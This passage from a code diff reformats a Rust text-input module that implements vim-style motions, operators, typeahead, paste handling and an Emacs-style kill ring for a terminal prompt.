             for _ in 0..n {
                 if *cursor > 0 {
-                    let prev = text[..*cursor].char_indices().last().map(|(b, _)| b).unwrap_or(0);
+                    let prev = text[..*cursor]
+                        .char_indices()
+                        .last()
+                        .map(|(b, _)| b)
+                        .unwrap_or(0);
                     *cursor = prev;
                 }
             }
@@ -582,64 +684,177 @@ fn vim_normal(
         "l" => {
             for _ in 0..n {
                 if *cursor < text.len() {
-                    *cursor = text[*cursor..].char_indices().nth(1).map(|(b, _)| *cursor + b).unwrap_or(text.len());
+                    *cursor = text[*cursor..]
+                        .char_indices()
+                        .nth(1)
+                        .map(|(b, _)| *cursor + b)
+                        .unwrap_or(text.len());
                 }
             }
             false
         }
-        "0" => { *cursor = text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0); false }
-        "^" => { *cursor = motion_first_nonblank(text, *cursor); false }
-        "$" => { *cursor = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len()); false }
-        "w" => { for _ in 0..n { *cursor = motion_w(text, *cursor); } false }
-        "b" => { for _ in 0..n { *cursor = motion_b(text, *cursor); } false }
-        "e" => { for _ in 0..n { *cursor = motion_e(text, *cursor); } false }
-        "W" => { for _ in 0..n { *cursor = motion_W(text, *cursor); } false }
-        "B" => { for _ in 0..n { *cursor = motion_B(text, *cursor); } false }
-        "E" => { for _ in 0..n { *cursor = motion_E(text, *cursor); } false }
-        "G" => {
-            *cursor = if n == 1 { motion_G(text) } else { motion_gg(text, n) };
+        "0" => {
+            *cursor = text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
             false
         }
-        "g" => { *pending = VimPendingState::G { count: n }; false }
+        "^" => {
+            *cursor = motion_first_nonblank(text, *cursor);
+            false
+        }
+        "$" => {
+            *cursor = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
+            false
+        }
+        "w" => {
+            for _ in 0..n {
+                *cursor = motion_w(text, *cursor);
+            }
+            false
+        }
+        "b" => {
+            for _ in 0..n {
+                *cursor = motion_b(text, *cursor);
+            }
+            false
+        }
+        "e" => {
+            for _ in 0..n {
+                *cursor = motion_e(text, *cursor);
+            }
+            false
+        }
+        "W" => {
+            for _ in 0..n {
+                *cursor = motion_W(text, *cursor);
+            }
+            false
+        }
+        "B" => {
+            for _ in 0..n {
+                *cursor = motion_B(text, *cursor);
+            }
+            false
+        }
+        "E" => {
+            for _ in 0..n {
+                *cursor = motion_E(text, *cursor);
+            }
+            false
+        }
+        "G" => {
+            *cursor = if n == 1 {
+                motion_G(text)
+            } else {
+                motion_gg(text, n)
+            };
+            false
+        }
+        "g" => {
+            *pending = VimPendingState::G { count: n };
+            false
+        }
         // ---- Find motions ----
-        "f" => { *pending = VimPendingState::Find { kind: VimFindKind::F, count: n }; false }
-        "F" => { *pending = VimPendingState::Find { kind: VimFindKind::BigF, count: n }; false }
-        "t" => { *pending = VimPendingState::Find { kind: VimFindKind::T, count: n }; false }
-        "T" => { *pending = VimPendingState::Find { kind: VimFindKind::BigT, count: n }; false }
+        "f" => {
+            *pending = VimPendingState::Find {
+                kind: VimFindKind::F,
+                count: n,
+            };
+            false
+        }
+        "F" => {
+            *pending = VimPendingState::Find {
+                kind: VimFindKind::BigF,
+                count: n,
+            };
+            false
+        }
+        "t" => {
+            *pending = VimPendingState::Find {
+                kind: VimFindKind::T,
+                count: n,
+            };
+            false
+        }
+        "T" => {
+            *pending = VimPendingState::Find {
+                kind: VimFindKind::BigT,
+                count: n,
+            };
+            false
+        }
         ";" => {
             if let Some((kind, c)) = *last_find {
-                if let Some(pos) = motion_find_char(text, *cursor, c, kind, n) { *cursor = pos; }
+                if let Some(pos) = motion_find_char(text, *cursor, c, kind, n) {
+                    *cursor = pos;
+                }
             }
             false
         }
         "," => {
             if let Some((kind, c)) = *last_find {
                 let rev = match kind {
-                    VimFindKind::F => VimFindKind::BigF, VimFindKind::BigF => VimFindKind::F,
-                    VimFindKind::T => VimFindKind::BigT, VimFindKind::BigT => VimFindKind::T,
+                    VimFindKind::F => VimFindKind::BigF,
+                    VimFindKind::BigF => VimFindKind::F,
+                    VimFindKind::T => VimFindKind::BigT,
+                    VimFindKind::BigT => VimFindKind::T,
                 };
-                if let Some(pos) = motion_find_char(text, *cursor, c, rev, n) { *cursor = pos; }
+                if let Some(pos) = motion_find_char(text, *cursor, c, rev, n) {
+                    *cursor = pos;
+                }
             }
             false
         }
         // ---- Operators ----
-        "d" => { *pending = VimPendingState::Operator { op: VimOperator::Delete, count: n }; false }
-        "c" => { *pending = VimPendingState::Operator { op: VimOperator::Change, count: n }; false }
-        "y" => { *pending = VimPendingState::Operator { op: VimOperator::Yank, count: n }; false }
+        "d" => {
+            *pending = VimPendingState::Operator {
+                op: VimOperator::Delete,
+                count: n,
+            };
+            false
+        }
+        "c" => {
+            *pending = VimPendingState::Operator {
+                op: VimOperator::Change,
+                count: n,
+            };
+            false
+        }
+        "y" => {
+            *pending = VimPendingState::Operator {
+                op: VimOperator::Yank,
+                count: n,
+            };
+            false
+        }
         // ---- Single-char delete/change shortcuts ----
         "x" => {
             if *cursor < text.len() {
-                let clen = text[*cursor..].chars().next().map(|c| c.len_utf8()).unwrap_or(1);
+                let clen = text[*cursor..]
+                    .chars()
+                    .next()
+                    .map(|c| c.len_utf8())
+                    .unwrap_or(1);
                 *yank_buf = text[*cursor..*cursor + clen].to_string();
                 text.drain(*cursor..*cursor + clen);
-                *cursor = (*cursor).min(text.len().saturating_sub(if text.is_empty() { 0 } else { 1 }));
+                *cursor =
+                    (*cursor).min(
+                        text.len()
+                            .saturating_sub(if text.is_empty() { 0 } else { 1 }),
+                    );
                 return true;
             }
             false
         }
         "X" => {
             if *cursor > 0 {
-                let prev = text[..*cursor].char_indices().last().map(|(b, _)| b).unwrap_or(0);
+                let prev = text[..*cursor]
+                    .char_indices()
+                    .last()
+                    .map(|(b, _)| b)
+                    .unwrap_or(0);
                 *yank_buf = text[prev..*cursor].to_string();
                 text.drain(prev..*cursor);
                 *cursor = prev;
@@ -648,7 +863,10 @@ fn vim_normal(
             false
         }
         "D" => {
-            let end = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len());
+            let end = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
             if end > *cursor {
                 *yank_buf = text[*cursor..end].to_string();
                 text.drain(*cursor..end);
@@ -657,7 +875,10 @@ fn vim_normal(
             false
         }
         "C" => {
-            let end = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len());
+            let end = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
             *yank_buf = text[*cursor..end].to_string();
             text.drain(*cursor..end);
             *mode = VimMode::Insert;
@@ -665,7 +886,11 @@ fn vim_normal(
         }
         "s" => {
             if *cursor < text.len() {
-                let clen = text[*cursor..].chars().next().map(|c| c.len_utf8()).unwrap_or(1);
+                let clen = text[*cursor..]
+                    .chars()
+                    .next()
+                    .map(|c| c.len_utf8())
+                    .unwrap_or(1);
                 *yank_buf = text[*cursor..*cursor + clen].to_string();
                 text.drain(*cursor..*cursor + clen);
                 *mode = VimMode::Insert;
@@ -675,7 +900,10 @@ fn vim_normal(
         }
         "S" => {
             let ls = text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
-            let le = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len());
+            let le = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
             *yank_buf = text[ls..le].to_string();
             text.drain(ls..le);
             *cursor = ls;
@@ -685,7 +913,10 @@ fn vim_normal(
         // ---- Yank shortcuts ----
         "Y" | "yy" => {
             let ls = text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
-            let le = text[*cursor..].find('\n').map(|p| *cursor + p + 1).unwrap_or(text.len());
+            let le = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p + 1)
+                .unwrap_or(text.len());
             *yank_buf = text[ls..le].to_string();
             false
         }
@@ -694,8 +925,14 @@ fn vim_normal(
             if !yank_buf.is_empty() {
                 let buf = yank_buf.clone();
                 let insert_pos = if *cursor < text.len() {
-                    text[*cursor..].char_indices().nth(1).map(|(b, _)| *cursor + b).unwrap_or(text.len())
-                } else { text.len() };
+                    text[*cursor..]
+                        .char_indices()
+                        .nth(1)
+                        .map(|(b, _)| *cursor + b)
+                        .unwrap_or(text.len())
+                } else {
+                    text.len()
+                };
                 text.insert_str(insert_pos, &buf);
                 *cursor = (insert_pos + buf.len()).saturating_sub(1);
                 return true;
@@ -712,27 +949,50 @@ fn vim_normal(
             false
         }
         // ---- Replace ----
-        "r" => { *pending = VimPendingState::Replace { count: n }; false }
+        "r" => {
+            *pending = VimPendingState::Replace { count: n };
+            false
+        }
         // ---- Toggle case ----
         "~" => {
             if *cursor < text.len() {
-                let clen = text[*cursor..].chars().next().map(|c| c.len_utf8()).unwrap_or(1);
+                let clen = text[*cursor..]
+                    .chars()
+                    .next()
+                    .map(|c| c.len_utf8())
+                    .unwrap_or(1);
                 let old: String = text[*cursor..*cursor + clen].to_string();
-                let new: String = old.chars().map(|c| {
-                    if c.is_uppercase() { c.to_lowercase().next().unwrap_or(c) }
-                    else { c.to_uppercase().next().unwrap_or(c) }
-                }).collect();
+                let new: String = old
+                    .chars()
+                    .map(|c| {
+                        if c.is_uppercase() {
+                            c.to_lowercase().next().unwrap_or(c)
+                        } else {
+                            c.to_uppercase().next().unwrap_or(c)
+                        }
+                    })
+                    .collect();
                 text.replace_range(*cursor..*cursor + clen, &new);
                 if *cursor < text.len() {
-                    *cursor = text[*cursor..].char_indices().nth(1).map(|(b, _)| *cursor + b).unwrap_or(text.len());
+                    *cursor = text[*cursor..]
+                        .char_indices()
+                        .nth(1)
+                        .map(|(b, _)| *cursor + b)
+                        .unwrap_or(text.len());
                 }
                 return true;
             }
             false
         }
         // ---- Indent ----
-        ">" => { *pending = VimPendingState::Indent { dir: '>', count: n }; false }
-        "<" => { *pending = VimPendingState::Indent { dir: '<', count: n }; false }
+        ">" => {
+            *pending = VimPendingState::Indent { dir: '>', count: n };
+            false
+        }
+        "<" => {
+            *pending = VimPendingState::Indent { dir: '<', count: n };
+            false
+        }
         // ---- Join lines ----
         "J" => {
             if let Some(nl_pos) = text[*cursor..].find('\n').map(|p| *cursor + p) {
@@ -746,7 +1006,10 @@ fn vim_normal(
         }
         // ---- Open line ----
         "o" => {
-            let le = text[*cursor..].find('\n').map(|p| *cursor + p).unwrap_or(text.len());
+            let le = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p)
+                .unwrap_or(text.len());
             text.insert(le, '\n');
             *cursor = le + 1;
             *mode = VimMode::Insert;
@@ -762,18 +1025,36 @@ fn vim_normal(
         // ---- dd/yy (multi-char fallthrough from legacy apply_vim_command) ----
         "dd" => {
             let ls = text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0);
-            let le = text[*cursor..].find('\n').map(|p| *cursor + p + 1).unwrap_or(text.len());
+            let le = text[*cursor..]
+                .find('\n')
+                .map(|p| *cursor + p + 1)
+                .unwrap_or(text.len());
             *yank_buf = text[ls..le].to_string();
             text.drain(ls..le);
             *cursor = ls.min(text.len());
             true
         }
         // ---- Register, marks, macros — set pending; actual work done in vim_command ----
-        "\"" => { *pending = VimPendingState::Register('\0'); false }
-        "m" => { *pending = VimPendingState::Mark; false }
-        "'" => { *pending = VimPendingState::JumpMark; false }
-        "q" => { *pending = VimPendingState::MacroRecord; false }
-        "@" => { *pending = VimPendingState::MacroReplay; false }
+        "\"" => {
+            *pending = VimPendingState::Register('\0');
+            false
+        }
+        "m" => {
+            *pending = VimPendingState::Mark;
+            false
+        }
+        "'" => {
+            *pending = VimPendingState::JumpMark;
+            false
+        }
+        "q" => {
+            *pending = VimPendingState::MacroRecord;
+            false
+        }
+        "@" => {
+            *pending = VimPendingState::MacroReplay;
+            false
+        }
         _ => false,
     }
 }
@@ -786,19 +1067,32 @@ fn vim_g(
     count: usize,
 ) -> bool {
     match key {
-        "g" => { *cursor = if count > 1 { motion_gg(text, count) } else { 0 }; false }
+        "g" => {
+            *cursor = if count > 1 { motion_gg(text, count) } else { 0 };
+            false
+        }
         "e" => {
             // `ge` — end of previous word
             for _ in 0..count.max(1) {
-                if *cursor == 0 { break; }
+                if *cursor == 0 {
+                    break;
+                }
                 let before = &text[..*cursor];
                 let chars: Vec<char> = before.chars().collect();
                 let n = chars.len();
                 let mut i = n;
-                while i > 0 && chars[i - 1].is_whitespace() { i -= 1; }
-                if i == 0 { *cursor = 0; break; }
+                while i > 0 && chars[i - 1].is_whitespace() {
+                    i -= 1;
+                }
+                if i == 0 {
+                    *cursor = 0;
+                    break;
+                }
                 let is_wc = is_word_char(chars[i - 1]);
-                while i > 1 && is_word_char(chars[i - 2]) == is_wc && !chars[i - 2].is_whitespace() { i -= 1; }
+                while i > 1 && is_word_char(chars[i - 2]) == is_wc && !chars[i - 2].is_whitespace()
+                {
+                    i -= 1;
+                }
                 *cursor = char_idx_to_byte(before, i - 1);
             }
             false
@@ -806,28 +1100,43 @@ fn vim_g(
         "E" => {
             // `gE` — end of previous WORD
             for _ in 0..count.max(1) {
-                if *cursor == 0 { break; }
+                if *cursor == 0 {
+                    break;
+                }
                 let before = &text[..*cursor];
                 let chars: Vec<char> = before.chars().collect();
                 let n = chars.len();
                 let mut i = n;
-                while i > 0 && chars[i - 1].is_whitespace() { i -= 1; }
-                while i > 1 && !chars[i - 2].is_whitespace() { i -= 1; }
+                while i > 0 && chars[i - 1].is_whitespace() {
+                    i -= 1;
+                }
+                while i > 1 && !chars[i - 2].is_whitespace() {
+                    i -= 1;
+                }
                 *cursor = char_idx_to_byte(before, i - 1);
             }
             false
         }
         "U" => {
             // `gU` — start case conversion uppercase operator
-            *pending = VimPendingState::Operator { op: VimOperator::Uppercase, count };
+            *pending = VimPendingState::Operator {
+                op: VimOperator::Uppercase,
+                count,
+            };
             false
         }
         "u" => {
             // `gu` — start case conversion lowercase operator
-            *pending = VimPendingState::Operator { op: VimOperator::Lowercase, count };
+            *pending = VimPendingState::Operator {
+                op: VimOperator::Lowercase,
+                count,
+            };
             false
         }
-        _ => { *pending = VimPendingState::None; false }
+        _ => {
+            *pending = VimPendingState::None;
+            false
+        }
     }
 }
 
@@ -857,7 +1166,10 @@ fn vim_operator(
         for _ in 0..count.max(1) {
             match text[le..].find('\n') {
                 Some(n) => le += n + 1,
-                None => { le = text.len(); break; }
+                None => {
+                    le = text.len();
+                    break;
+                }
             }
         }
         let le = le.min(text.len());
@@ -883,33 +1195,119 @@ fn vim_operator(
     }
     // Count prefix after operator (e.g. d3w)
     if key.len() == 1 && key.chars().next().unwrap().is_ascii_digit() {
-        *pending = VimPendingState::OperatorCount { op, count, digits: key.to_string() };
+        *pending = VimPendingState::OperatorCount {
+            op,
+            count,
+            digits: key.to_string(),
+        };
         return false;
     }
     // `g` prefix
-    if key == "g" { *pending = VimPendingState::OperatorG { op, count }; return false; }
+    if key == "g" {
+        *pending = VimPendingState::OperatorG { op, count };
+        return false;
+    }
     // Simple motions
     let target = match key {
-        "h" => { let mut p = *cursor; for _ in 0..count.max(1) { if p > 0 { p -= 1; } } p }
-        "l" => { let mut p = *cursor; for _ in 0..count.max(1) { if p < text.len() { p = text[p..].char_indices().nth(1).map(|(b,_)| p+b).unwrap_or(text.len()); } } p }
-        "w" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_w(text, p); } p }
-        "b" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_b(text, p); } p }
-        "e" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_e(text, p); } p }
-        "W" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_W(text, p); } p }
-        "B" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_B(text, p); } p }
-        "E" => { let mut p = *cursor; for _ in 0..count.max(1) { p = motion_E(text, p); } p }
-        "0" => text[..*cursor].rfind('\n').map(|p| p+1).unwrap_or(0),
+        "h" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                if p > 0 {
+                    p -= 1;
+                }
+            }
+            p
+        }
+        "l" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                if p < text.len() {
+                    p = text[p..]
+                        .char_indices()
+                        .nth(1)
+                        .map(|(b, _)| p + b)
+                        .unwrap_or(text.len());
+                }
+            }
+            p
+        }
+        "w" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_w(text, p);
+            }
+            p
+        }
+        "b" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_b(text, p);
+            }
+            p
+        }
+        "e" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_e(text, p);
+            }
+            p
+        }
+        "W" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_W(text, p);
+            }
+            p
+        }
+        "B" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_B(text, p);
+            }
+            p
+        }
+        "E" => {
+            let mut p = *cursor;
+            for _ in 0..count.max(1) {
+                p = motion_E(text, p);
+            }
+            p
+        }
+        "0" => text[..*cursor].rfind('\n').map(|p| p + 1).unwrap_or(0),
         "^" => motion_first_nonblank(text, *cursor),
-        "$" => text[*cursor..].find('\n').map(|p| *cursor+p).unwrap_or(text.len()),
-        "G" => if count == 1 { motion_G(text) } else { motion_gg(text, count) },
-        _ => { return false; }
+        "$" => text[*cursor..]
+            .find('\n')
+            .map(|p| *cursor + p)
+            .unwrap_or(text.len()),
+        "G" => {
+            if count == 1 {
+                motion_G(text)
+            } else {
+                motion_gg(text, count)
+            }
+        }
+        _ => {
+            return false;
+        }
     };
-    if target == *cursor { return false; }
-    let (from, to) = if target < *cursor { (target, *cursor) } else { (*cursor, target) };
+    if target == *cursor {
+        return false;
+    }
+    let (from, to) = if target < *cursor {
+        (target, *cursor)
+    } else {
+        (*cursor, target)
+    };
     // Inclusive adjustment for e, E, $
     let to_adj = if matches!(key, "e" | "E" | "$") {
-        text[to..].char_indices().nth(1).map(|(b,_)| to+b).unwrap_or(text.len())
-    } else { to };
+        text[to..]
+            .char_indices()
+            .nth(1)
+            .map(|(b, _)| to + b)
+            .unwrap_or(text.len())
+    } else {
+        to
+    };
     let (new_text, new_cursor) = apply_operator_range(op, text, from, to_adj, yank_buf, mode);
     *text = new_text;
     *cursor = new_cursor.min(text.len());
@@ -932,13 +1330,22 @@ fn vim_operator_count(
     if key.len() == 1 && key.chars().next().unwrap().is_ascii_digit() {
         let new_digits = format!("{}{}", digits, key);
         let d: usize = new_digits.parse().unwrap_or(10000).min(10000);
-        *pending = VimPendingState::OperatorCount { op, count, digits: d.to_string() };
+        *pending = VimPendingState::OperatorCount {
+            op,
+            count,
+            digits: d.to_string(),
+        };
         return false;
     }
     let motion_count: usize = digits.parse().unwrap_or(1);
     let effective = count.saturating_mul(motion_count).min(10000);
-    *pending = VimPendingState::Operator { op, count: effective };
-    vim_operator(mode, text, cursor, key, yank_buf, pending, last_find, op, effective)
+    *pending = VimPendingState::Operator {
+        op,
+        count: effective,
+    };
+    vim_operator(
+        mode, text, cursor, key, yank_buf, pending, last_find, op, effective,
+    )
 }
 
 fn vim_operator_g(
@@ -954,8 +1361,12 @@ fn vim_operator_g(
         "g" => {
             let target = if count > 1 { motion_gg(text, count) } else { 0 };
             let (from, to) = (target.min(*cursor), target.max(*cursor));
-            let to_le = text[to..].find('\n').map(|p| to+p+1).unwrap_or(text.len());
-            let (new_text, new_cursor) = apply_operator_range(op, text, from, to_le, yank_buf, mode);
+            let to_le = text[to..]
+                .find('\n')
+                .map(|p| to + p + 1)
+                .unwrap_or(text.len());
+            let (new_text, new_cursor) =
+                apply_operator_range(op, text, from, to_le, yank_buf, mode);
             *text = new_text;
             *cursor = new_cursor.min(text.len());
             op != VimOperator::Yank
@@ -976,10 +1387,14 @@ pub fn apply_vim_command(
 ) {
     match key {
         // Mode transitions
-        "i" if *mode == VimMode::Normal => { *mode = VimMode::Insert; }
+        "i" if *mode == VimMode::Normal => {
+            *mode = VimMode::Insert;
+        }
         "a" if *mode == VimMode::Normal => {
             *mode = VimMode::Insert;
-            if *cursor < text.len() { *cursor += 1; }
+            if *cursor < text.len() {
+                *cursor += 1;
+            }
         }
         "I" if *mode == VimMode::Normal => {
             *mode = VimMode::Insert;
@@ -989,28 +1404,50 @@ pub fn apply_vim_command(
             *mode = VimMode::Insert;
             *cursor = text.len();
         }
-        "Escape" => { *mode = VimMode::Normal; }
+        "Escape" => {
+            *mode = VimMode::Normal;
+        }
         // Normal mode motions
         "h" if *mode == VimMode::Normal => {
             *cursor = cursor.saturating_sub(1);
         }
         "l" if *mode == VimMode::Normal => {
-            if *cursor < text.len() { *cursor += 1; }
+            if *cursor < text.len() {
+                *cursor += 1;
+            }
         }
-        "0" if *mode == VimMode::Normal => { *cursor = 0; }
-        "$" if *mode == VimMode::Normal => { *cursor = text.len(); }
+        "0" if *mode == VimMode::Normal => {
+            *cursor = 0;
+        }
+        "$" if *mode == VimMode::Normal => {
+            *cursor = text.len();
+        }
         "w" if *mode == VimMode::Normal => {
             // Move to start of next word
             let rest = &text[*cursor..];
-            let skip_word = rest.chars().take_while(|c| c.is_alphanumeric() || *c == '_').count();
-            let skip_space = rest[skip_word..].chars().take_while(|c| c.is_whitespace()).count();
+            let skip_word = rest
+                .chars()
+                .take_while(|c| c.is_alphanumeric() || *c == '_')
+                .count();
+            let skip_space = rest[skip_word..]
+                .chars()
+                .take_while(|c| c.is_whitespace())
+                .count();
             *cursor = (*cursor + skip_word + skip_space).min(text.len());
         }
         "b" if *mode == VimMode::Normal => {
             // Move to start of previous word
             let before = &text[..*cursor];
-            let skip_space = before.chars().rev().take_while(|c| c.is_whitespace()).count();
-            let skip_word = before[..before.len() - skip_space].chars().rev().take_while(|c| c.is_alphanumeric() || *c == '_').count();
+            let skip_space = before
+                .chars()
+                .rev()
+                .take_while(|c| c.is_whitespace())
+                .count();
+            let skip_word = before[..before.len() - skip_space]
+                .chars()
+                .rev()
+                .take_while(|c| c.is_alphanumeric() || *c == '_')
+                .count();
             *cursor = cursor.saturating_sub(skip_space + skip_word);
         }
         "x" if *mode == VimMode::Normal => {
@@ -1018,7 +1455,9 @@ pub fn apply_vim_command(
             if *cursor < text.len() {
                 *yank_buf = text.chars().nth(*cursor).unwrap_or_default().to_string();
                 text.remove(*cursor);
-                if *cursor > 0 && *cursor >= text.len() { *cursor = text.len().saturating_sub(1); }
+                if *cursor > 0 && *cursor >= text.len() {
+                    *cursor = text.len().saturating_sub(1);
+                }
             }
         }
         "dd" if *mode == VimMode::Normal => {
@@ -1061,10 +1500,7 @@ pub struct TypeaheadSuggestion {
 }
 
 /// Compute typeahead suggestions for the current input.
-pub fn compute_typeahead(
-    input: &str,
-    slash_commands: &[(&str, &str)],
-) -> Vec<TypeaheadSuggestion> {
+pub fn compute_typeahead(input: &str, slash_commands: &[(&str, &str)]) -> Vec<TypeaheadSuggestion> {
     let mut suggestions = Vec::new();
 
     if let Some(cmd_prefix) = input.strip_prefix('/') {
@@ -1089,10 +1525,7 @@ pub fn compute_typeahead(
 
 /// Handle a paste event. If the content is > 1024 bytes, returns a placeholder
 /// string `[Pasted text #N (+X lines)]` and the original content (for storage).
-pub fn handle_paste(
-    content: &str,
-    paste_counter: &mut u32,
-) -> (String, Option<String>) {
+pub fn handle_paste(content: &str, paste_counter: &mut u32) -> (String, Option<String>) {
     if content.len() <= 1024 {
         return (content.to_string(), None);
     }
@@ -1329,7 +1762,9 @@ impl PromptInputState {
 
     /// Insert a character at cursor position.
     pub fn insert_char(&mut self, c: char) {
-        if self.mode == InputMode::Readonly { return; }
+        if self.mode == InputMode::Readonly {
+            return;
+        }
         self.text.insert(self.cursor, c);
         self.cursor += c.len_utf8();
         self.update_token_estimate();
@@ -1337,13 +1772,17 @@ impl PromptInputState {
 
     /// Insert a newline (Shift+Enter).
     pub fn insert_newline(&mut self) {
-        if self.mode == InputMode::Readonly { return; }
+        if self.mode == InputMode::Readonly {
+            return;
+        }
         self.insert_char('\n');
     }
 
     /// Delete the character before cursor.
     pub fn backspace(&mut self) {
-        if self.cursor == 0 || self.mode == InputMode::Readonly { return; }
+        if self.cursor == 0 || self.mode == InputMode::Readonly {
+            return;
+        }
         let prev = self.text[..self.cursor]
             .char_indices()
             .last()
@@ -1356,7 +1795,9 @@ impl PromptInputState {
 
     /// Delete the character at cursor.
     pub fn delete(&mut self) {
-        if self.cursor >= self.text.len() || self.mode == InputMode::Readonly { return; }
+        if self.cursor >= self.text.len() || self.mode == InputMode::Readonly {
+            return;
+        }
         self.text.remove(self.cursor);
         self.update_token_estimate();
     }
@@ -1387,7 +1828,9 @@ impl PromptInputState {
 
     /// Navigate history up (older).
     pub fn history_up(&mut self) {
-        if self.history.is_empty() { return; }
+        if self.history.is_empty() {
+            return;
+        }
         match self.history_pos {
             None => {
                 self.history_draft = self.text.clone();
@@ -1428,7 +1871,8 @@ impl PromptInputState {
     pub fn paste(&mut self, content: &str) {
         let (text, stored) = handle_paste(content, &mut self.paste_counter);
         if let Some(stored_content) = stored {
-            self.paste_contents.insert(self.paste_counter, stored_content);
+            self.paste_contents
+                .insert(self.paste_counter, stored_content);
         }
         for c in text.chars() {
             self.text.insert(self.cursor, c);
@@ -1440,8 +1884,11 @@ impl PromptInputState {
 
     /// Ctrl+K: Cut from cursor to end of line and save to kill ring.
     pub fn kill_line(&mut self) {
-        if self.mode == InputMode::Readonly { return; }
-        let line_end = self.text[self.cursor..].find('\n')
+        if self.mode == InputMode::Readonly {
+            return;
+        }
+        let line_end = self.text[self.cursor..]
+            .find('\n')
             .map(|p| self.cursor + p)
             .unwrap_or(self.text.len());
 
@@ -1454,8 +1901,11 @@ impl PromptInputState {
 
     /// Ctrl+U: Cut from line start to cursor and save to kill ring.
     pub fn kill_line_backward(&mut self) {
-        if self.mode == InputMode::Readonly { return; }
-        let line_start = self.text[..self.cursor].rfind('\n')
+        if self.mode == InputMode::Readonly {
+            return;
+        }
+        let line_start = self.text[..self.cursor]
+            .rfind('\n')
             .map(|p| p + 1)
             .unwrap_or(0);
 
@@ -1469,7 +1919,9 @@ impl PromptInputState {
 
     /// Ctrl+W: Cut previous word and save to kill ring.
     pub fn kill_word_backward(&mut self) {
-        if self.mode == InputMode::Readonly || self.cursor == 0 { return; }
+        if self.mode == InputMode::Readonly || self.cursor == 0 {
+            return;
+        }
         let before = &self.text[..self.cursor];
         let chars: Vec<char> = before.chars().collect();
         let mut idx = chars.len();
@@ -1499,7 +1951,9 @@ impl PromptInputState {
 
     /// Ctrl+Y: Paste from kill ring (most recent).
     pub fn yank(&mut self) {
-        if self.mode == InputMode::Readonly { return; }
+        if self.mode == InputMode::Readonly {
+            return;
+        }
         if let Some(text) = self.kill_ring.get_current() {
             for c in text.chars() {
                 self.text.insert(self.cursor, c);
@@ -1512,13 +1966,17 @@ impl PromptInputState {
 
     /// Alt+Y: Cycle through kill ring backward.
     pub fn yank_pop(&mut self) {
-        if self.mode == InputMode::Readonly { return; }
+        if self.mode == InputMode::Readonly {
+            return;
+        }
         self.kill_ring.cycle_backward();
     }
 
     /// Alt+Backspace: Delete word backward.
     pub fn delete_word_backward(&mut self) {
-        if self.mode == InputMode::Readonly || self.cursor == 0 { return; }
+        if self.mode == InputMode::Readonly || self.cursor == 0 {
+            return;
+        }
         let before = &self.text[..self.cursor];
         let chars: Vec<char> = before.chars().collect();
         let mut idx = chars.len();
@@ -1548,7 +2006,9 @@ impl PromptInputState {
 
     /// Alt+Delete: Delete word forward.
     pub fn delete_word_forward(&mut self) {
-        if self.mode == InputMode::Readonly || self.cursor >= self.text.len() { return; }
+        if self.mode == InputMode::Readonly || self.cursor >= self.text.len() {
+            return;
+        }
         let rest = &self.text[self.cursor..];
         let chars: Vec<char> = rest.chars().collect();
         let mut idx = 0;
@@ -1577,7 +2037,9 @@ impl PromptInputState {
 
     /// Alt+B: Jump to previous word.
     pub fn move_word_backward(&mut self) {
-        if self.cursor == 0 { return; }
+        if self.cursor == 0 {
+            return;
+        }
         let before = &self.text[..self.cursor];
         let chars: Vec<char> = before.chars().collect();
         let mut idx = chars.len();
@@ -1601,7 +2063,9 @@ impl PromptInputState {
 
     /// Alt+F: Jump to next word.
     pub fn move_word_forward(&mut self) {
-        if self.cursor >= self.text.len() { return; }
+        if self.cursor >= self.text.len() {
+            return;
+        }
         let rest = &self.text[self.cursor..];
         let chars: Vec<char> = rest.chars().collect();
         let mut idx = 0;
@@ -1611,7 +2075,8 @@ impl PromptInputState {
                     idx += 1;
                 }
             } else if !chars[idx].is_whitespace() {
-                while idx < chars.len() && !is_word_char(chars[idx]) && !chars[idx].is_whitespace() {
+                while idx < chars.len() && !is_word_char(chars[idx]) && !chars[idx].is_whitespace()
+                {
                     idx += 1;
                 }
             }
@@ -1624,7 +2089,9 @@ impl PromptInputState {
 
     /// Alt+D: Delete word after cursor.
     pub fn delete_word_at_cursor(&mut self) {
-        if self.mode == InputMode::Readonly || self.cursor >= self.text.len() { return; }
+        if self.mode == InputMode::Readonly || self.cursor >= self.text.len() {
+            return;
+        }
         let rest = &self.text[self.cursor..];
         let chars: Vec<char> = rest.chars().collect();
         let mut idx = 0;
@@ -1663,11 +2130,13 @@ impl PromptInputState {
                         // Simple case: text only grew (cursor at end of inserted span)
                         let from = before.len().min(self.cursor);
                         let _ = from; // use cursor-based diff below
-                        // Find the diff between before/after texts at current cursor
-                        // Inserted = text[insert_start..cursor] but we don't track start.
-                        // Approximate: whole text minus before, substring at cursor.
-                        // Better: store cursor-at-entry and extract.
